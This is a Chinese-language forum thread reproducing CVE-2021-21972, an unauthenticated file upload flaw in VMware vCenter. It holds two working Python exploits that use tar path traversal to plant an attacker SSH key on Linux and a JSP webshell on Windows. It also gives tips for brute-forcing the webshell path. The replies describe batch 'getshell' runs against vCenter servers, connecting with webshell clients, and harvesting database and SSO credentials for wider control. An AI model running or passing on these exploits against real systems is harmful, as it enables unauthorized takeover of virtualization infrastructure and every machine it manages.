CVE-2021-21972 Vmware vcenter未授权任意文件漏洞复现

1.安装EXSI 7.0.0

VMware vSphere虚拟机监控程序(ESXi) 链接: https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso档案大小: 350 MB MD5: 220d2e87290f50c3508214cadf66b737 SHA1: 7fda0401ee1b2f49aae89043f9b2d509cf7e25db

安装:VMware ESXi 6.7安装配置-Happy峰-51CTO博客

下载 vCenter Server

VMware vCenter Server 链接: https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso VMware-VCSA-all-7.0.0-15952498.iso档案大小: 6.42 GB MD5: 94bb30ae83cd5f12e2eecce114d43007 SHA1: 17aa2b1ee20e977fb4f8f8391563f57c3e456361

安装:https://blog.csdn.net/qq_38028248/article/details/107712839

过程很痛苦。机器差的时候很难受

建议安装的时候弄个好点的机器。不然等的人难受死了

安装完成之后访问一下

漏洞URL

http://192.168.1.74/ui/vropspluginui/rest/services/uploadova

ssh 密钥的生成 【首先你需要建立一个vsphere-ui 用户。然后执行】

└──╼ $ssh-keygen -t rsa 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vsphere-ui/.ssh/id_rsa): 
Created directory '/home/vsphere-ui/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/vsphere-ui/.ssh/id_rsa.
Your public key has been saved in /home/vsphere-ui/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:LOMvCLXw5tFpjsVBZ9XS5ytU/CRKWba+gAlvObdFqnM [email protected]
The key's randomart image is:
+---[RSA 2048]----+
|         ..o +o  |
|      . o . =.=..|
|     . o.  o =o+ |
|  . . .. o +o+. .|
|   + +ooS B.+ o. |
|  . =.*o . +.+.. |
|   + B.   o E..  |
|    + o.   o     |
|       ..        |
+----[SHA256]-----+

POC

import tarfile
import os
from io import BytesIO
import requests

proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}

def return_zip():
    with tarfile.open("test.tar", 'w') as tar:
        payload = BytesIO()
        id_rsa_pub='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyBpWm4gYdlD7v2AJw7F1GQcnXA+XNBC5ZQfau6XqePZa53gNz1oobSopNbZCbZ/nm50Z0OkIk3XjYmfNXovh4xlVKjCHPDYkoWzDo2A6y8nNFGmVtsACSg5CxpdscYXnrqbhlc+PCjmL6lTs/y8Zul+mYIstNp+oRCmIxEwRgM6g5PxKnlDcDnUW9OCwgK579Q1NR8GasTRIxrYSPHmiyEdv1nfE3KKDOkHfBrTKHR08FYgJDlyGG2rdn6PpuMpR+hV17t/EgbKEAxMqAmBgh3eVFoFJasP5x8pUBmRLg0F1F/zs7bzn3pNJTc97LdxB9UfTEgqiAkOTE47julDIF [email protected]'
        tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
        f1 = BytesIO(id_rsa_pub.encode())
        tarinfo.size = len(f1.read())
        f1.seek(0)
        tar.addfile(tarinfo, fileobj=f1)
        tar.close()
        payload.seek(0)
def getshell(url):
    files = {'uploadFile':open('test.tar','rb')}
    try:
        r = requests.post(url=url, files=files,proxies=proxies,verify = False).text
        print(r)
    except:
        print('连接服务器失败')

if __name__ == "__main__":
    try:
        return_zip()
        url="https://192.168.1.74/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e

执行完之后。进行登陆尝试

这种方式只针对Linux 有效

Windows 需要改一下POC

#coding:utf-8
import tarfile
import os
from io import BytesIO
import requests
import base64

proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}


def return_zip():
    with tarfile.open("test.tar", 'w') as tar:
        payload = BytesIO()
        shell='xxxx'
        data = base64.b64decode(shell)
        tarinfo = tarfile.TarInfo(name="..\\..\\ProgramData\\VMware\\vCenterServer\\data\\perfcharts\\tc-instance\\webapps\\statsreport\\test.jsp")
        f1 = BytesIO(data)
        tarinfo.size = len(f1.read())
        f1.seek(0)
        tar.addfile(tarinfo, fileobj=f1)
        tar.close()
        payload.seek(0)

def getshell(url):
    files = {'uploadFile':open('test.tar','rb')}
    try:
        r = requests.post(url=url, files=files,proxies=proxies,verify = False).text
        print(r)
        print('shell地址:/statsreport/test.jsp')
    except:
        print('连接服务器失败')

if __name__ == "__main__":
    try:
        return_zip()
        url="https://192.168.1.74/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e

对于Linux 为什么不直接写一个shell 因为不解析。只能通过写ssh key的方式。
如果需要写shell 的话。目录在。
/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/xx/0/h5ngc.war/resources/

xx 是随机数字。
这个直接用burp 来进行爆破即可。

2 Likes

我来补充一下上个批量exp的图吧。这个漏洞是部署的路径发生变化。其实shell已经上传了。但是webapps不对所以。访问不了。需要fuzz。但是有的fuzz几百个都不成功。那么可能是没有漏洞.jsp。大部分站到是解析我批量测试了一波。


windows主机

34

我用你的工具对一些vcenter服务器getshell,也提示成功,但是用蚁剑连不上怎么回事?(如1图) :smiley:

后来用冰蝎连接上了 。 :joy:

1 Like

大佬, 能否再讲一下如何进一步利用 vCenter ?
:innocent:

连上就行了。我能想到的https://blog.csdn.net/longfeizzu/article/details/108669467获取vCenter数据库的账号密码然后通过数据库看看能不能vCenterSSO账号密码。那么应该可以管理所有vm虚拟机。这玩意没有深入了解过。我没实际操作过。

vCenter真是非常重要的网络设施,但是手头没有可测试的内网案例。 那些vSphere Client网页版点击登录,最终还是内网IP.

好吧。没有深入研究。完了打算搞个研究渗透技术和代码审计。工具编写的交流群毕竟有的东西有点敏感。只适合小范围交流

你忽略掉证书就可以了